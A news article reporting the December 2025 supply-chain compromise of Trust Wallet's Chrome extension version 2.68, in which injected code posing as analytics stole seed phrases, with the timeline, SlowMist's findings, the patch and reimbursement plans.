A security incident affected Trust Wallet’s Chrome browser extension specifically version 2.68, leading to approximately $7 million in unauthorized cryptocurrency drains across hundreds of user wallets.
The issue began surfacing on December 25, 2025, shortly after a compromised update was released on December 24. Malicious JavaScript code was injected into the extension, disguised as analytics functionality using a library like posthog-js.
This code silently exfiltrated users’ mnemonic seed phrases (recovery phrases) when wallets were unlocked or imported, sending them to an attacker-controlled domain (api.metrics-trustwallet[.]com, registered on December 8, 2025).
Attackers then used these phrases to drain funds rapidly, primarily in Bitcoin, Ethereum, and Solana. Investigations suggest a sophisticated supply-chain attack, possibly involving compromised developer access or deployment processes prior to mid-December.
Register for Tekedia Mini-MBA edition 19 (Feb 9 – May 2, 2026): big discounts for early bird.
Tekedia AI in Business Masterclass opens registrations.
Join Tekedia Capital Syndicate and co-invest in great global startups.
Register for Tekedia AI Lab: From Technical Design to Deployment (next edition begins Jan 24 2026).
Some analysts including SlowMist describe it as potentially APT-level, though the exact method is still under review. Only the Chrome browser extension version 2.68 was affected. Mobile app users and other browser extension versions were not impacted. No core protocol or blockchain-level vulnerability was involved.
Trust Wallet quickly released a patched version (2.69) on December 25 and urged users to update immediately. Changpeng Zhao (CZ, Binance co-founder and Trust Wallet owner and the official Trust Wallet team confirmed that all affected users will be fully reimbursed.
Losses are estimated at ~$7 million, and the team is prioritizing refunds via a dedicated support process users should submit claims through official channels only. As of December 26, Trust Wallet posted:”We’ve confirmed that approximately $7M has been impacted and we will ensure all affected users are refunded.”
If you used the browser extension: Do not open version 2.68. Disable it in Chrome extensions. Update to version 2.69 via the official Chrome Web Store: Trust Wallet Extension. If affected, submit a claim via Trust Wallet’s official support form as announced on their X account.
Mobile-only users are safe and unaffected. This incident highlights risks with browser-based wallets and automatic updates. For maximum security, consider hardware wallets for significant holdings or sticking to verified mobile apps.
The Trust Wallet incident was a classic supply-chain attack targeting the official Chrome browser extension. On December 24, 2025, version 2.68 was released via the Chrome Web Store containing malicious code that exfiltrated users’ mnemonic seed phrases.
This led to rapid drains across multiple chains Bitcoin, Ethereum/EVM, Solana, totaling approximately $7 million in losses affecting hundreds of users. The attack was not due to phishing, user error, or a compromised third-party npm package. Instead, attackers directly tampered with Trust Wallet’s internal source code before deployment.
Security firm SlowMist provided the most detailed analysis by comparing versions 2.67 (clean) and 2.68 (compromised): Malicious Code Injection: Added code iterated through all stored wallets in the extension. It triggered internal requests to retrieve encrypted mnemonic phrases for each wallet.
Using the user’s password entered during wallet unlock, it decrypted the phrases locally. The decrypted seed phrases were sent to an attacker-controlled server. The code masqueraded as legitimate analytics using the open-source library posthog-js a real analytics tool Trust Wallet uses.
Attackers redirected PostHog traffic to their fake domain, making it blend in with normal analytics behavior. The primary malicious logic was in a bundled JavaScript file often referenced as 4482.js in analyses. Once attackers had the seed phrases, they could import wallets elsewhere and drain funds instantly—no transaction approvals or user interaction needed.
Domain metrics-trustwallet[.]com registered via NICENIC INTERNATIONAL registrar. December 21, 2025: First observed requests to the malicious API. December 24, 2025: Compromised version 2.68 released. December 25, 2025: Drains reported en masse; Trust Wallet issues warning and releases patched version 2.69.
The domain mimicked legitimate Trust Wallet infrastructure and is now offline. Investigations from SlowMist, PeckShield, and on-chain analysts like ZachXBT point to: Likely compromise of developer devices, code repositories, or deployment permissions prior to mid-December.
Attackers showed deep familiarity with Trust Wallet’s codebase. Some speculation including from Binance co-founder CZ of possible insider involvement or nation-state actor like APT-level sophistication, though no conclusive evidence yet. Trust Wallet is still investigating the exact breach vector.
Only Chrome extension version 2.68 affected mobile app and other versions safe. Trust Wallet patched with version 2.69 on December 25 and committed to full reimbursements for all victims ~$7M total. Stolen funds partially laundered via exchanges like ChangeNOW, FixedFloat, and KuCoin.
This incident underscores the risks of browser extensions with auto-updates and highlights the need for stricter supply-chain security in crypto tools. For high-value holdings, hardware wallets remain the safest option.